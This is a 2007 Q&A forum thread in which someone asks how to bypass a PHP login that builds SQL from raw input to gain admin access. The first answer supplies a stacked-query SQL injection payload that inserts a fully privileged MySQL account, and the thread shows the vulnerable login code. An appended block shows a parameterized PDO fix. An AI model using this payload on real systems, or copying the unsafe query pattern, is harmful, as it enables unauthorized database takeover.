Can anyone tell me what I can put in the input fields to get administration options... an SQL injection... with these terms... of action...
========== It's PHP, and $username and $password are the inputs...
if ($username && $password) {
    $query = sprintf("SELECT * FROM login WHERE username = '$username' and password = '$password'");
    $result = mysql_query($query);
    $account = mysql_fetch_array($result);
}
if ($account) {
    $_SESSION['id'] = $account['id'];
    header("location:admin.php");
    exit;
} else {
    echo " u are no admin.... ";
}
=======

2007-12-16 09:55:11 · 2 answers · asked by truepal20032001 2 in Computers & Internet Programming & Design

Yes, I mean the application admin... just assume the table names as you desire...

2007-12-18 15:12:32 · update #1

2 answers

Do you mean admin permissions for the database or the application? It sounds like you mean the application, in which case you haven't provided enough information. You'd need to know how admins are specified in the database.

If you do mean the database, however, something like this might do the job:

$username = "whatever";
$password = "password'; INSERT INTO `user` ( `Host` , `User` , `Password` , `Select_priv` , `Insert_priv` , `Update_priv` , `Delete_priv` , `Create_priv` , `Drop_priv` , `Reload_priv` , `Shutdown_priv` , `Process_priv` , `File_priv` , `Grant_priv` , `References_priv` , `Index_priv` , `Alter_priv` , `Show_db_priv` , `Super_priv` , `Create_tmp_table_priv` , `Lock_tables_priv` , `Execute_priv` , `Repl_slave_priv` , `Repl_client_priv` , `ssl_type` , `ssl_cipher` , `x509_issuer` , `x509_subject` , `max_questions` , `max_updates` , `max_connections` )
VALUES (
'localhost', 'me', 'mypass', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0'
);";

For that to work, you'd have to assume the site admin is dumb enough to run general queries using a DB user with sufficient privileges to run that query (like root).

2007-12-16 13:53:45 · answer #1 · answered by Wiseguy 4 · 0 0

The following source link should be of interest.

Also, standards dictate that we provide a full URL (http:// and all) for header()-based redirections.

2007-12-16 18:07:00 · answer #2 · answered by Agent Feyd 4 · 0 0
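For comparison with the login check in the question, a hardened form of the same lookup, added here as an example and not code from the asker or either answerer. It assumes PDO with an in-memory SQLite database standing in for the MySQL server so it runs offline; the `password_hash` column, the `authenticate()` helper and the sample account are constructed for illustration.

```php
<?php
// Added example: the question's login check rewritten with bound parameters.
// Assumptions: SQLite in memory replaces MySQL; schema and account are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the
// server itself receives the statement and the values separately.

$pdo->exec('CREATE TABLE login (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE NOT NULL,
    password_hash TEXT NOT NULL)');
$insert = $pdo->prepare('INSERT INTO login (username, password_hash) VALUES (?, ?)');
$insert->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

/**
 * Returns the account id on success, null otherwise.
 * The SQL text is fixed; user input only ever travels as a bound value,
 * so a quote character in it cannot end the string literal.
 */
function authenticate(PDO $pdo, string $username, string $password): ?int
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM login WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password never enters the query: it is checked in PHP against a hash.
    if ($row !== false && password_verify($password, $row['password_hash'])) {
        return (int) $row['id'];
    }
    return null;
}

// Legitimate login: returns the account id.
var_dump(authenticate($pdo, 'admin', 'correct horse'));

// Input shaped like the one in answer #1 (elided as "..."): treated as plain
// data, matches no row, returns null.
var_dump(authenticate($pdo, 'whatever', "password'; INSERT INTO ..."));

// The table still holds exactly the one constructed account.
var_dump((int) $pdo->query('SELECT COUNT(*) FROM login')->fetchColumn());

// In the page itself the result would gate the session, e.g.:
//   $id = authenticate($pdo, $username, $password);
//   if ($id !== null) { session_regenerate_id(true); $_SESSION['id'] = $id; }
```

On the privilege point raised in answer #1: the database account the page connects with needs only SELECT on the `login` table, so a statement that writes to the server's user table is refused regardless of how it arrives.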